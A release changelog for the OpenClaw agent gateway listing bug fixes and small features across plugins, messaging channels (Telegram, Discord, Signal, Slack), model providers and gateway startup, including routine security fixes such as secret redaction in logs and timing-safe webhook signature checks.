<li>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</li>
<li>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</li>
<li>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</li>
<li>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</li>
<li>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</li>
<li>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</li>
<li>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</li>
<li>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</li>
<li>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</li>
<li>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</li>
<li>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</li>
<li>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</li>
<li>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</li>
<li>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</li>
<li>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</li>
<li>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</li>
<li>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</li>
<li>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</li>
<li>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</li>
<li>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</li>
<li>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</li>
<li>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</li>
<li>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</li>
<li>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</li>
<li>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</li>
<li>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</li>
<li>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</li>
<li>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</li>
<li>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</li>
<li>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</li>
<li>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</li>
<li>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</li>
<li>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</li>
<li>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</li>
<li>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</li>
<li>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</li>
<li>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</li>
<li>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</li>
<li>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</li>
<li>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</li>
<li>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</li>
<li>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</li>
<li>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</li>
<li>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</li>
